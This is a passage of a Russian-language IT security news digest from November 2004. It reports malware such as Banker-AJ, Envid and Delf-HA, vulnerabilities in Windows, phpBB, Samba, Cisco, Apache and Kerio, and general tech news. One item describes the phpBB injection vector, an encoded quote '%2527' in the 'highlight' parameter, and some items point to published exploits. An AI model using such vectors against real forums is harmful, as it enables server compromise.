8 место отвоевала хозяйка ноутбука, который был благополучно забыт на крыше автомобиля. Женщина, как и полагается, завела мотор автомобиля и тронулась, ноутбук в это время тихонько скатился по багажнику на асфальт, все могло бы обойтись, если бы женщина не сдала назад, раздавив его всем весом автомобиля с полностью загруженным багажником.
Компьюлента

16/11/2004 17:00 Finjan: в Windows XP SP2 найдено 10 уязвимостей
Используя десять уязвимостей в Windows XP, обнаруженных в ServicePack 2, хакеры могут «незаметно и удаленно» взять под контроль компьютеры миллионов пользователей во время посещения веб-страниц с вредоносным кодом, утверждают специалисты американской компании Finjan Software. По их словам, SP2 открывает возможность переключать в браузере Internet Explorer «зоны безопасности» с «интернета» на «локальную», выполняя таким образом сценарии, запрещенные для веб-страниц, а именно: работа с файловой системой и запуск исполняемых файлов. Система предупреждения пользователя о том, что исполняемый файл (.EXE) был загружен из интернета и представляет потенциальную опасность, также может быть отключена. Специалисты компании передали всю информацию в Microsoft и даже продемонстрировали эксплойт и написали за специалистов корпорации код, устраняющий уязвимости. Вместе с тем, они постарались не допустить усиления атак хакеров и не опубликовали подробную информацию о «дырах» до выпуска Microsoft соответствующей «заплаты». «Для предотвращения создания вредоносных кодов представители Finjan не будут сообщать никаких технических подробностей до тех пор, пока Microsoft полностью не устранит уязвимости», — говорится в заявлении компании. Исполнительный директор и основатель Finjan Software Шломо Тобул (Shlomo Touboul) считает, что необходимо менять всю систему: «Хотя недавно выпущенная XP SP2 предоставляет определенную защиту, но эта защита уязвима, поскольку основа — та же самая операционная система с узявимостями, подвергающими опасности конечного пользователя».
CNews

16/11/2004 15:36 Выход Crypto-Gram
Как и положено, 15 числа текущего месяца выпущен очередной, ноябрьский, номер журнала Crypto-Gram, о чём традиционно сообщил основатель и CTO компании Counterpane Internet Security Брюс Шнайер. В новом номере: Why Election Technology is Hard, Electronic Voting Machines, Clever Virus Attack, Mail-in Ballot Attack, Computer Security and Liability, Crypto-Gram Reprints, World Series Security, News, Counterpane News, The Security of Checks and Balances, The Doghouse: Merced County, Security Information Management Systems (SIMS), Technology and Counterterrorism, Comments from Readers.

16/11/2004 15:24 Найден новый вирус массовой рассылки Envid
Компания Symantec обнаружила очередную вредоносную программу, получившую название Envid. После запуска этот червь массовой рассылки создает в директории Windows файл Msngrabber.exe, регистрируется в системном реестре, завершает работу ряда запущенных приложений и пытается загрузить из интернета дополнительный компонент с названием NovoDownExe.txt. Далее вирус осуществляет сканирование жестких дисков в поисках адресов электронной почты, по которым впоследствии высылаются сообщения с поддельным адресом и содержимым файла NovoDownExe.txt. Таким образом, червь Envid представляет собой своеобразный спамерский инструмент для организации массовых рассылок рекламного или какого-либо иного характера.
Описание вируса

16/11/2004 15:02 Вирус ворует банковские пароли
Специалисты по информационной безопасности предупреждают о появлении нового вируса - троянца Banker-AJ. С помощью этой программы мошенники воруют деньги с интернет-счетов. Особенно обеспокоены клиенты банков Abbey, Barclays, Egg, HSBC, Lloyds TSB, Nationwide и NatWest, со счетов которых пропали десятки тысяч долларов. Ведь троян Banker-AJ создан «специально для них». Попадая в компьютер, троян ничем не проявляет себя до тех пор, пока пользователь не посетит сайт одного из этих банков. Тогда Banker-AJ начинает действовать, запоминает банковский пароль клиента и отправляет его хакеру, который может залезть на счет ни о чем не подозревающего пользователя и украсть его деньги. «Людей постоянно предостерегают от электронных сообщений, которые направляют беззаботных пользователей на фальшивые банковские сайты, чтобы узнать конфиденциальную информацию об их счетах. Но это троян особенный - он ждет, пока пользователь отправится на настоящий банковский сайт, а потом тайно следит за тем, как он вводит пароль. Это как будто грабитель смотрит вам через плечо, когда вы набираете PIN-код кредитной карты,- предупреждают специалисты. - Пользователям не стоит паниковать, им нужно просто установить антивирусное программное обеспечение и скачивать обновления, тогда они будут защищены от всех последних опасностей».
Crime-Research.ru

16/11/2004 14:42 Sun официально представила Solaris 10
Как и ожидалось ранее, 15 ноября, в понедельник Sun официально представила новую версию своей операционной системы Solaris, сообщает "Компьюлента". На создание Solaris 10 компания потратила свыше 500 миллионов долларов США, а результатом работы программистов фирмы стало появление в ОС около 600 новых функций и нескольких уникальных программных механизмов. Прежде всего, стоит выделить так называемую контейнерную технологию. Данная технология позволяет изолировать друг от друга различные участки операционной системы и приложения, что существенно повышает надежность работы компьютера и улучшает безопасность. Всего могут быть назначены до восьми тысяч контейнеров. Вторым важным нововведением в Solaris 10 стала методика выявления и устранения неполадок DTrace, которая обеспечивает возможность мониторинга процесса работы ядра и сопутствующих программ в режиме реального времени. Посредством DTrace администраторы могут быстро решать возникающие проблемы при минимальном снижении производительности компьютерной сети. Кроме того, нельзя не упомянуть новую файловую систему ZFS (Zettabyte File System), благодаря которой облегчается работа с данными при одновременном повышении надежности хранения информации. Среди прочих особенностей новой операционной системы следует назвать встроенный комплекс самодиагностики, высокий уровень безопасности и высокое быстродействие при работе в локальной сети. Наконец, производитель выделяет возможность запуска приложений, изначально разрабатывавшихся под операционную систему Linux. Платформа Solaris 10 ориентирована на использование, в первую очередь, в крупных компьютерных центрах, банках, телекоммуникационных компаниях и правительственных организациях. Операционная система может устанавливаться на компьютеры на базе процессоров Sun Sparc, серверы с чипами Intel и AMD на основе архитектуры х86, а также на компьютеры с 64-разрядными процессорами AMD Opteron. Ниже мы также приводим ссылку, с которой желающие могут скачать ISO-образы новой ОС для платформ SPARC и x86.
Описание Solaris 10
Страница загрузки

16/11/2004 14:30 Adobe обновит PDF-инструменты
Гигант издательского ПО, компания Adobe Systems намерена изменить способ работы с документами на предприятиях. Вчера производитель ПО должен был анонсировать новые версии Acrobat и Reader, своих основных инструментов для создания и просмотра файлов на основе стандарта PDF (Portable Document Format). В числе новых функций расширенные средства коллективной работы, нацеленные на упрощение обмена информацией между предприятиями и их заказчиками или партнерами. До сих пор тем, кто хотел добавить комментарии в документ PDF, нужно было иметь версию Adobe Acrobat, то есть полный набор инструментов PDF-авторинга, говорит директор по маркетингу продукта Adobe Acrobat Пэм Децил. Новая версия Acrobat Professional 7 позволит авторам включать в документы функции комментариев, которые затем будут доступны пользователям новой версии Adobe Reader, бесплатной программы чтения — а теперь и редактирования — файлов PDF. По словам Децил, эти дополнения помогут тем предприятиям, которые уже перешли на внутренний стандарт работы с PDF и теперь хотят распространить его на обмен документами с другими компаниями. Дополнительные функции в бесплатной и широко распространенной программе Reader позволят каждому принять участие в этом процессе.
Более подробно

16/11/2004 14:17 Билл Гейтс отказался играть с модификаторами приставки Xbox
Корпорация Microsoft начала предпринимать активные меры по борьбе с модификациями ее игровой приставки Xbox, сообщает Associated Press. За несколько дней до выпуска компаний уже успевшей стать популярной игры Halo 2 значительное число пользователей оказались отключены от службы Microsoft Xbox Live, позволяющей играть с живыми соперниками в онлайне. Подписываясь на сервис Xbox Live, пользователь автоматически позволяет корпорации собирать данные о своей приставке. Microsoft воспользовалась этим правом и отключила от онлайновой службы тех, кто, по данным корпорации, каким-либо способом модифицировал свою приставку. Так называемые мод-чипы, используемые для изменения возможностей Xbox, а также увеличение ее жесткого диска позволяют слушать с помощью приставки музыку и запускать на ней пиратские диски, а также разработанные для операционной системы Linux программы. Кроме того, мод-чипы позволяют мошенничать в играх, используя "читы". Как сообщил представитель Microsoft, компания предпринимает шаги, необходимые для того, чтобы пользователям никто не мешал. "Наша цель - обеспечить честную онлайновую игру", - заявил он. Microsoft борется с мод-чипами, появившимися одновременно с выпуском Xbox, уже четыре года. Кульминации эта борьба достигла в 2002 году, когда после обращения компании в министерство юстиции был закрыт сайт, на котором продавались мод-чипы и осуществлялся обмен нелегальными копиями игр.
Lenta.ru

16/11/2004 14:05 Yahoo! готова тестировать собственный антиспамерский стандарт
Компании EarthLink и Yahoo! заявили в понедельник о готовности начать тестирование антиспамерской технологии DomainKeys, сообщает Reuters. В основу технологии заложено внедрение в электронные письма цифровой подписи, которая позволит почтовым серверам отличать обычные письма от спама. Согласно замыслам специалистов Yahoo! цифровая подпись в письмах будет сверяться с подписью SMTP-сервера. Таким образом, пользователи избавятся от писем, идущих с фальшивых или несуществующих электронных адресов. Для рядовых пользователей внедрение DomainKeys должно пройти абсолютно незаметно. Основная часть интернет-экспертов согласна с тем, что DomainKeys обеспечивает более высокий уровень безопасности нежели антиспамерский стандарт SenderID, предложенный компанией Microsoft. Вместе с тем специалисты признают, что внедрить DomainKeys будет значительно сложнее. Кроме того, DomainKeys требует на 10% больше вычислительных ресурсов сервера. В настоящее время DomainKeys используется индийским интернет-провайдером Sify и почтовой службой Google - Gmail.
Viruslist

16/11/2004 13:59 Microsoft намерена заявить права на 130 протоколов, включая TCP/IP
Компания Microsoft "порадовала" сообщество разработчиков открытого кода очередными притязаниями "запатентовать еще что-нибудь". В этот раз под прицелом компании оказались более 130 протоколов соединений, включая "главный" - TCP/IP. Насколько обоснованы притязания компании на "святое" и чем это может закончиться, на данном этапе сказать сложно. Особенно учитывая типично монополистский подход Microsoft к вопросам поддержки разработок других компаний. Захват компанией даже нескольких основных протоколов значительно осложнил бы жизнь всем разработчиков систем с открытым кодом. Тем не менее, Microsoft пока не приводит конкретных документов, подтверждающих права компании на интеллектуальную собственность заявленных форматов, равно как и холдинговые права.
PROext

15/11/2004 17:34 Американец, обвиняемый в незаконной продаже исходного кода Windows, считает себя невиновным
Американец Уильям Дженовезе, арестованный по обвинению в незаконной продаже исходного кода операционных систем Windows NT 4.0 и Windows 2000, отказывается признавать себя виновным. По словам Дженовезе, Microsoft и правоохранительные органы задержали его только потому, что не смогли установить личности тех, кто украл исходный код Windows в самой компании. В отличие от тысяч других пользователей, воспользовавшихся появившимся исходным кодом, Уильям Дженовезе разместил его на своем сайте illmob.org. "В шутку я разместил объявление, в котором пообещал за небольшую плату поделиться с желающими кодом Windows, который в то время любой желающий качал по IRC", - пояснил Дженовезе. Через несколько дней после того, как Дженовезе разместил свою шутку, ему позвонил человек и поинтересовался суммой, которую надо заплатить за получение кода. "Мне было смешно. Я подумал, что это какой-нибудь идиот, который не знает, как скачать код", - рассказал Дженовезе.
Далее:Лаборатория Касперского

15/11/2004 17:27 "Кавказ-центр" получил хостинг в Швеции
Информационный сайт чеченских террористов "Кавказ-центр" возобновил работу, переехав в Швецию. Хостинг "Кавказ-центру" был предоставлен шведским интернет-провайдером Rix Telecom (www.port80.se). До этого "Кавказ-центр" работал в Финляндии, но 11 октября был закрыт по требованию финской полиции.
По материалам lenta.ru

15/11/2004 17:25 Шестой версии Winamp уже не появится
Корпорация AOL, которая еще в 1999 году приобрела компанию Nullsoft, занимающиеся выпуском популярного медиаплеера Winamp, сейчас испытывает некоторые трудности, связанные с оттоком клиентов. В связи с этим, руководством корпорации было принято решение об экономии финансов, уменьшив затраты на малозначимые внутренние проекты. В число этих проектов попал медиаплеер Winamp.
После ухода создателя Winamp'а Джастина Фрэнкеля из-за конфликтов с новым начальством, проект продолжительное время находился в "подвешенном" состоянии и мало развивался. Теперь же, принятые начальством AOL меры, оставили недовольными и остальных ведущих разработчиков Winamp, которые в итоге покинули компанию AOL Time Warner, написав на днях заявления об уходе.
В сложившийся ситуации корпорация AOL планирует полное закрытие проекта или временное закрытие проекта с возможностью реорганизацию в будущем, а пока пользователям обещается только выпуск версий Winamp, которые будут содержать в себе только исправления ошибок, обнаруженных в предыдущих версиях.
Компьюлента

14/11/2004 22:58 Сын подал в суд на мать, не купившую ему компьютер
По сообщению газеты China Daily одиннадцатилетний мальчик из центрального Китая подал в суд на свою мать, которая пообещала ему за успешную учебу купить компьютер, но не сделала этого. Мама аргументировала свой отказ тем, что у нее просто нет возможности приобрести обещанный компьютер. Мальчик, несмотря на свой небольшой возраст, оказался довольно деловым человеком и обратился в суд с просьбой, заставить его мать выполнить данное ему в устной форме обещание. В итоге судья смог примирить сына с матерью, но купили или нет мальчику компьютер, осталось неизвестным.
the INQUIRER

14/11/2004 17:54 Россия - второй в мире производитель детского порно для Интернета
Организация National Children's Homes, опубликовала данные своего исследования о происхождении детского порно. Россия заняла в итоговом списке одно из "призовых" мест. Приблизительно 55% всех материалов имеет американское происхождение, на долю же России приходится 23% контента для педофилов. Основным средством распространения детского порно, по мнению экспертов из National Children's Homes, является Интернет и p2p-сети.
Internet.Ru

13/11/2004 22:22 Неофициальный патч, закрывающий уязвимость FRAME/IFRAME в Internet Explorer
Томас Рогг разработал небольшую утилиту, которая позволяет устранить обнаруженную недавно FRAME/IFRAME уязвимость в Internet Explorer. Данная утилита не вносит изменений в системные файлы ОС, она просто изменяет HTML код страниц перед их загрузкой в браузере. Установка данного патча позволит обезопасить ваш компьютер от заражения вирусами, которые уже используют эту брешь в системе, таких как MyDoom.AI и MyDoom.AH, а также позволит исключить возможность получения полного доступа к вашему компьютеру, используя эту уязвимость.
Патч

13/11/2004 21:29 Уязвимость в phpBB 2
Джессика Соулз из команды How Dark Security сообщает об обнаружении уязвимости в форуме phpBB. Уязвимость заключается в некорректной обработке параметра "highlight" скрипта "viewtopic.php", из-за неправильной обработки возможно закодировать одиночную кавычку при помощи "%" так, что она не будет блокироватся слэшем. Поэтому адрес содержащий "%2527" в параметре "highlight" вызывает ошибку работы скрипта, а точнее ошибку выполнения функции "preg_replace". Использование данной уязвимости позволяет выполнить произвольный код на стороне сервера, используя команды PHP, это станет возможным только в том случае, если злоумышленнику удастся закрыть описание функции "preg_replace" и перейти на выполнение следующей строчки кода. Подверженны данной уязвимости скрипты форума phpBB версий 2.0.х - 2.0.10.
SecurityFocus BUGTRAQ

13/11/2004 17:28 Переполнение буфера в Microsoft Windows DDEShare
Обнаружена опасная уязвимость в Microsoft Windows DDEShare, которая позволяет произвести переполнение буфера исполняемого модуля "ddeshare.exe" при использование длинного имени "DDE Share Name". Использование данной уязвимости может позволить злоумышленнику выполнить произвольный шелл-код на компьютере жертвы.
Список подверженных систем:
+ Microsoft Windows 2000 Advanced Server;
+ Microsoft Windows 2000 Datacenter Server;
+ Microsoft Windows 2000 Professional;
+ Microsoft Windows 2000 Server;
+ Microsoft Windows XP Home;
+ Microsoft Windows XP Professional.
SecurityFocus BUGTRAQ

12/11/2004 13:47 Возможность DoS атаки на Kerio Personal Firewall
Карл Лин из eEye Digital Security обнаружил опасную уязвимость в Kerio Personal Firewall для MS Windows. Уязвимость заключается в некорректной низкоуровневой обработке TCP, UDP и ICMP пакетов одним из компонентов программы - "FWDRV.SYS". Для осуществления удаленной атаки, злоумышленнику достаточно послать всего один специально сформированный пакет, чтобы заблокировать функциональность Kerio Personal Firewall. Данной уязвимости подвержены все версии Kerio Personal Firewall с 4.0.0 до 4.1.1, уязвимость была устранена в версии 4.1.2.
eEye Digital Security

12/11/2004 12:09 Американец, продававший исходники Windows, получит десять лет тюрьмы
Во вторник был арестован американец Уильям Дженовиз, обвиняемый в незаконной продаже в интернете украденных исходных кодов операционных систем Windows NT 4.0 и Windows 2000 компании Microsoft.
Исходный код Windows был похищен в середине февраля текущего года и опубликован в интернете. Как заявляли представители Microsoft, взлома серверов Microsoft не было, а код был похищен у партнеров Microsoft, имеющих доступ к исходникам Windows в рамках программы Shared Source. Выяснилось, что код перед своим похищением находился в распоряжении компании Mainsoft.
Если двадцатисемилетний американец будет признан виновным, то ему грозит до десяти лет тюремного заключения и 250000 долларов США штрафа.
Подробнее: compulenta.ru

11/11/2004 15:20 Уязвимость в Samba
Karol Wiesek сообщает о обнаруженной уязвимости в Samba, которая может быть использована для проведения DoS (Denial of Service) атаки на уязвимую систему. Уязвимость связана с неправильной проверкой входной последовательности в функции "ms_fnmatch()" при сравнении имени файла с маской. В результате обращение к каталогу с большим количеством символов '*' в имени приводит к исчерпанию ресурсов в smbd. Уязвимость подтверждена в версии 3.0.7 и более ранних. Патч выпущен.
Advisories: Samba, iDEFENSE, Secunia
Патч для Samba 3.0.7: samba.org

11/11/2004 15:16 Уязвимость в DHCP Cisco IOS
Secunia сообщае об уязвимости в Cisco IOS, которая позволяет злоумышленникам порвести DoS (Denial of Service) атаку на уязвимую систему. Уязвимость возникает из-за ошибки в обработке DHCP пакетов, которая при обработке специально созданного DHCP пакета может привести к блокированию очереди входящих пакетов. Уязвимость обнаружена в Cisco IOS 12.x, Cisco IOS R12.x, Cisco ONS 15000 Series. Обновление выпущено.
Advisories: Cisco, US-CERT, Secunia

11/11/2004 14:55 Атака хакеров на сайт www.president.com.ua
Как сообщает сайт crime-research.ru, в результате хакерской атаки с нынешней ночи не доступен сайт www.president.com.ua, сообщили RUpor`у в этом издании. По словам собеседника, коллектив сайта сейчас предпринимает все усилия для восстановления работы сайта и надеется, что уже завтра они увенчаются успехом. Сайт www.president.com.ua – специализируется на предоставлении разнообразной информации, связанной с нынешними президентскими выборами.
crime-research.ru

11/11/2004 14:53 PHP-разработчики обиделись на «Студию Артемия Лебедева»
Как известно, «Студия Артемия Лебедева» недавно выставила на перепродажу 47 доменов, зарегистрированных ею за последние пять лет. Среди лотов значится и домен PHP.ru, что вызвало неоднозначную реакцию со стороны разработчиков. Причина в том, что «Студия Лебедева» планировала создать на сайте PHP.ru информационный ресурс, посвященный программированию на PHP. На главной странице этого сайта до сих пор можно увидеть «индикатор прогресса» (как оказалось, фальшивый) и надпись «На сайте планируется размещение статей, инструкций и советов по PHP». Но сайт так и не был открыт, а «Студия Лебедева» решила просто-напросто продать домен. Однако, тяжело себе представить кому такой домен может понадобиться, тем более по цене минимум в $5000, ведь существующие информационные сайты, посвященные PHP, давно работают и отлично зарекомендовали себя. Это php5.ru, phpclub.ru, phpfaq.ru, phpinside.ru и др.
webplanet.ru

11/11/2004 14:52 На Gmail появился POP3
Google сделала еще один шаг навстречу пользователям бесплатной почтовой службы Gmail, когда сообщила о поддержке в нем протокола POP3. Это открывает целый ряд новых возможностей. Доставка почты с Google осуществляется с сервера pop.gmail.com по порту 995, а SMTP-сервер располагается по адресу smtp.gmail.com с открытыми портами 465 и 587. Для авторизации требуется SSL/TLS. В данный момент поддержка протокола POP3 появилась лишь для избранных бета-тестеров Gmail, но в течение ближайших нескольких недель Google обещает подключить ее для всех остальных. Поддержку IMAP обещают внедрить в будущем.
webplanet.ru

11/11/2004 14:52 Microsoft запустила бету поисковика
Корпорация Microsoft вечером в среду запустила в эксплуатацию бета-версию своего нового поискового движка. По сути, это первая серьезная атака корпорации на позиции, оккупированные компанией Google. Новый сервис доступен по адресу beta.search.msn.com на 11 языках, сообщил представитель Microsoft. Также представитель сообщил, что видит на этом рынке огромные возможности для развития и роста, передает Reuters. В планах Microsoft серьезным образом повысить доход, получаемый с контекстной рекламы в результатах поиска. Согласно информации Microsoft, на данный момент поисковая база MSN Search содержит 5 млрд страниц. Компания Google в среду заявила, что буквально недавно объем ее индекса составил 8 млрд страниц.
webplanet.ru

11/11/2004 14:48 Вирусы нарушают цикл выпуска исправлений Microsoft
Создатели последнего варианта вируса MyDoom (некоторые антивирусные фирмы называют его Bofra), который использует недавно обнаруженную уязвимость iFrame в Internet Explorer, как будто нарочно рассчитали время их выпуска таким образом, чтобы сорвать месячный цикл исправлений Microsoft. В последнем регулярном обновлении, которое вышло во вторник, Microsoft не успела исправить серьезную ошибку в браузере Internet Explorer, так как она была обнаружена всего за несколько дней до срока его выхода. В начале этой недели появились сразу два варианта вируса MyDoom, оставив компании единственную возможность временно проигнорировать проблему. Шон Ричмонд, старший консультант Sophos Australia, сказал ZDNet, что за четыре дня Microsoft все равно не смогла бы создать и протестировать надежное исправление. «За этот срок выпустить стабильную поправку для IE невозможно, так как ее необходимо тщательно оттестировать. Месячный цикл исправлений вводился для того, чтобы облегчить системным администраторам планирование обновлений, но нескольких дней Microsoft недостаточно, чтобы создать и оттестировать патч». Однако, если проблема окажется достаточно серьезной, компания нарушит свой цикл обновлений и выпустит патч во внеурочное время.
ZDNet

10/11/2004 14:42 Новый троян Delf-HA рассылает SMS-спам
The Register со ссылкой на Sophos сообщил, что специалисты этой антивирусной компании обнаружили новую троянскую программу рассылающую спам посредством SMS сообщений. Троянец Troj/Delf-HA, инфицировав компьютер, прописывает себя в ключ автозапуска реестра, пытается загрузить файл с текстом sms сообщения с сайта www.vlasof1.narod.ru (на данный момент сайт уже не работает - прим. newsmaker) и рассылает SMS через сайты российских мобильных провайдеров на случайные номера телефонов с префиксом +7921 и +7911 (Номера МТС и МЕГАФОН Северо-Западного региона).
Источник: The Register, описание вируса: Sophos.com

10/11/2004 14:16 Computer Associates выпустила систему защиты Wi-Fi
Computer Associates выпустила систему обеспечения безопасности работы беспроводных локальных сетей (Wi-Fi) Wireless Site Management 4.0 (WSM). По утверждению разработчиков, WSM позволяет отслеживать несанкционированное подключение к сети устройств и базовых станций и отключать их, обеспечивать доступ в сеть только при помощи специального клиентского приложения, а также управлять политиками безопасности. К примеру, администратор может установить временные ограничения на доступ в сеть. Система автоматически создает, распространяет и синхронизирует ключи доступа, а также позволяет определить физические границы доступа. WSM является частью решения eTrust по управлению корпоративными политиками безопасности. Новинка внедрена в единый интерфейс Unicenter. Помимо управляющих возможностей, в нее встроены средства просмотра информации о сети.
cnews.ru

10/11/2004 14:16 Microsoft выпустила обновление для ISA Server 2000 и Proxy Server 2.0
Корпорация Microsoft выпустила очередной бюллетень безопасности, описывающий брешь в программных пакетах Proxy Server 2.0, Internet Security and Acceleration Server 2000 и Small Business Server 2000/2003. Как сообщается, ошибка возникает при кэшировании обратных DNS-запросов и теоретически может использоваться злоумышленниками с целью подмены содержимого веб-страниц. Уязвимость охарактеризована софтверным гигантом как "важная". Качестве временной меры защиты специалисты Microsoft рекомендуют системным администраторам изменить значение размера DNS-кэша в настройках вышеназванных программных продуктов на ноль. Правда, подобная операция может оказать негативное влияние на производительность системы. Более подробную информацию можно прочитать в бюллетене безопасности MS04-039.
MS04-039

10/11/2004 14:15 Panda Software: Недельный отчет о вирусах
Вышел очередной еженедельный отчет о вирусах от Panda Software. Сегодняшний отчет посвящен почтовым червям Bagz.H и Mitglieder.AY, а также троянцу Citifraud.A.
Отчет

10/11/2004 14:15 Новая торговая марка Украинского Антивирусного Центра
Украинский Антивирусный Центр, разработчик комплексных систем антивирусной защиты, сообщает о регистрации торговой марки «UNA», а также регистрации доменного имени UNA.UA. Украинский Антивирусный Центр успешно прошел процедуру регистрации торговой марки «UNA» и получил в Государственном департаменте интеллектуальной собственности «Свидетельство на знак для товаров и услуг», подтверждающее право на владение данной торговой маркой.
Вебпланета

10/11/2004 13:20 Поиск по исходным текстам программ
По информации Opennet.ru, запущен поисковый сервис koders.com, осуществляющий поиск по исходным текстам программ. Проиндексировано более 125 миллионов строк кода, на 16 языках программирования (ASP,C#,Delphi,Fortran,JavaScript, С/С++, Perl, PHP, Python,VB/VB.NET, Ruby, SQL, Java, Tcl). Возможна детализация поиска по языку программирования и лицензии. Система отлично подходит для поиска типовых решений.
Поисковый сайт: www.koders.com
Источник: www.opennet.ru

9/11/2004 19:21 Заключенный из Колорадо случайно взломал компьютерную систему округа
Заключенный из штата Колорадо получил доступ к секретной персональной информации шерифа и 1000 работников местной администрации, подобрав пароль к окружной компьютерной системе, сообщает агентство Reuters. Окружной шериф Джон Кук заявил, что он был шокирован тем, что преступнику, отбывающему наказание, удалось получить доступ к конфиденциальной информации, в частности, к номерам карт социального обеспечения. По словам представителя фирмы Affiliated Computer Services, отвечающей за работу системы, факта взлома компьютеров зафиксировано не было. Выяснилось, что заключенный просто ввел неверный идентификационный номер пользователя, который совпал с паролем и позволил войти в систему. В ходе проведенных в тюремных камерах обысков было обнаружено большое количество распечаток с конфиденциальными данными. До окончания расследования прочие подробности не разглашаются.
Компьюлента

9/11/2004 13:14 Финальный релиз Firefox 1.0
Mozilla Foundation объявила о выпуске окончательной стабильной версии web-браузера Firefox 1.0. Для Mozilla это первый значитеный релиз продукта с 2002 года, когда был выпущен Mozilla Suite. Релиз Firefox 1.0 - результат почти двухгодичной работы огромного числа людей над новым браузером, предварительную версию (Preview Release) которого скачало более восьми миллионов человек. Firefox 1.0 для операционных систем Linux, Mac OS X и Windows уже доступен для бесплатного скачивания на сайте Mozilla.
mozilla.org

9/11/2004 12:00 Уязвимость в gzip
Сообщается об обнаружении нескольких уязвимостей в gzip, которые могут быть использованы для повышения полномочий локального пользователя. Уязвимость связана со скриптами "gzexe.in", "zdiff.in" и "znew.in" которые создают временные файлы. Это может быть использовано для аттаки с использованием symlink-ов, что приведет к созданию или перезаписи произвольного файла с правами пользователя, запустившего скрипт. Уязвимость присутствует в версиях 1.2.4 и 1.3.2, другие версии также могут быть уязвимы.
Advisories: secunia.com, trustix.org.

9/11/2004 11:56 Ошибки в Mantis
Secunia сообщает о двух уязвимостях в Mantis (популярной bugtrack системе), которые могут быть использованы злоумышленниками для раскрытия потенциально важной информации. Первая - выбор опции "All Projects" открывает все проекты, в том числе и те, к которым у пользователя нет доступа. Вторая - пользователи, удаленные из проекта, могут по прежнему получать информацию о добавлении багов. Уязвимости найдены в версии 0.19.0, другие версии также могут быть уязвимы. Рекомендуется обновить Mantis до версии 0.19.1.
Источник; Original Advisory #1, #2; Обновление.

7/11/2004 17:02 C Днём Октябрьской революции!
Команда UINC поздравляет всех с наступившим праздником Великой Октябрьской Социалистической революции! Пострадавшим выражает соболезнование!
SOLDIER

7/11/2004 15:40 В Symantec разработали антивирус и брандмауэр для смартфонов Nokia
Компания Symantec одной из первых среагировала на появление вирусов для мобильных телефонов и хакерские атаки. Выпущенное в начале ноября программное средство Symantec Client Security для устройств Nokia - это одно из первых в мире встроенных решений для устройств на базе ОС Symbian. Оно может использоваться в смартфонах Nokia 9500 и Nokia 9300.
Это программное обеспечение, впервые обеспечивающее комплексную защиту мобильных смартфонов с помощью антивирусных средств и межсетевого экрана, поставляется загруженным в карту памяти телефона и может обновляться через беспроводную сеть с использованием функции LiveUpdate.
В настоящее время коммуникатор Nokia 9500 с программным обеспечением Symantec Client Security поставляется в Европу и некоторые страны Азиатско-Тихоокеанского региона.
Компьюлента

7/11/2004 15:22 Возможность проведения DoS атаки на веб-сервер Apache
Уязвимость, найденная Кристианом Триведи, позволяет произвести удаленную атаку типа DoS (Denial of Service) на веб-сервер Apache 2.0.x. Уязвимость заключается в неправильной обработке заголовков, содержащих большое количество пробелов, что способно вызвать увеличение объемов, используемых ресурсов системы. Данная уязвимость отнесена к рангу не критичных, т.к. при прекращении получения заголовка с пробелами, система возвращается к своей нормальной работе. Данная уязвимость была устранена в Apache 2.0.53-dev.
Эксплоит

6/11/2004 19:56 Выход FreeBSD 5.3-RELEASE
Сегодня с задержкой в один день вышел долгожданный стабильный релиз 5-ой ветки системы FreeBSD. Релиз содержит ряд улучшений, которые не могут не радовать пользователей: это исправление различных обнаруженных ошибок, добавление драйверов с поддержкой гигабитных интерфейсов, изменение алгоритмов работы GEOM framework, переработана работа звуковой системы, оптимизация работы сетевого стека с SMP, а также переработка самого SMP и многое другое.
Но по качеству исполнения, данный релиз с трудом можно назвать стабильным, т.к. остался довольно-таки большой список не решенных проблем: плохое быстродействие некоторых сетевых адаптеров, некоторые проблемы с файрволами, небольшие проблемы с SMP при работе на AMD64 системе, проблемы с Vinum и ATA рейд массивами, а также другие менее значительные проблемы.
FreeBSD-Announce

5/11/2004 20:06 Вышел «Системный администратор»
Вышел очередной номер журнала «Системный администратор», сообщает www.nixp.ru. В октябрьском номере:«Знакомство с Cooperative Linux»; «OpenGroupware.org, или Последний кирпич в стене»; «Идеальный карманный компьютер для системного администратора. Часть 1»; «Настройка squid для использования авторизации из домена Windows 2000»; «PostgreSQL: функции и триггеры»; «Внутренний веб-сервер»; «Hakin9 Live»; «Поиск троянов вручную»; «Восстановление данных на NTFS-разделах. Часть 2»; «Установка и настройка W2K Server»; и другие материалы.
www.samag.ru

5/11/2004 20:06 Эксплоит уязвимости MSIE
Berend-Jan Wever в Full-Disclosure опубликовал код эксплоита недавно обнаруженной уязвимости в MSIE. Эксплоит работает с тегами <FRAME> и <IFRAME> и с помощью Java-скрипта вызывает переполнение буфера в Internet Explorer.
Код эксплоита: lists.netsys.com

5/11/2004 20:04 Россия поддержит глобальную антипиратскую инициативу правительства США
В России вступили в силу поправки к закону о защите авторских прав. Россия поддерживает глобальную инициативу США по борьбе с пиратской продукцией. Об этом, как передает РИА "Новости", заявил руководитель Федеральной службы по интеллектуальной собственности, патентам и товарным знакам (Роспатента) Борис Симонов. Выступая на пресс-конференции в четверг, Симонов, в часности, сказал: "Американцы предлагают инициативу "STOP!", по которой должны быть охвачены все страны, которой этой болезнью заражены. Это правильная инициатива, нам необходимы консультации, чтобы понять, что нужно сделать для присоединения к ней России". Об инициативе "STOP!" (Strategy Targeting Organized Piracy, "стратегия, направленная против организованного пиратства") объявили власти США в начале октября. Главная задача инициативы - борьба на всемирном уровне с производством и распространением контрафактной медиапродукции. Глава Роспатента привет данные, гласящие, что в 2004 году в России против производителей пиратской продукции было возбуждено более тысячи уголовных дел, что в три раза больше, чем в 2003. Уголовному наказанию подверглось около 700 преступников, нарушивших законодательство об интеллектуальной собственности и товарных знаках.
lenta.ru

4/11/2004 18:05 Проблемы с проверкой сертификата в Cisco Secure ACS
Сообщается об обнаруженной уязвимости в Cisco Secure ACS. Уязвимость связана с неправильной проверкой сертификатов в Cisco Secure Access Control Server с настроенным для аутентификации пользователей Extensible Authentication Protocol-Transport Layer Security (EAP-TLS). Уязвимость приводит к тому, что пользователь с просроченным, или сфабрикованным сертификатом может получить доступ, если сертификат содержит правильное имя и криптографически корректен. Уязвимость присутствует в продукте версии 3.3.1 под Windows. В версии 3.3.2 ошибка исправлена. Обновление доступно на сайте Cisco.
cisco.com

4/11/2004 18:05 В Internet Explorer обнаружена критическая уязвимость
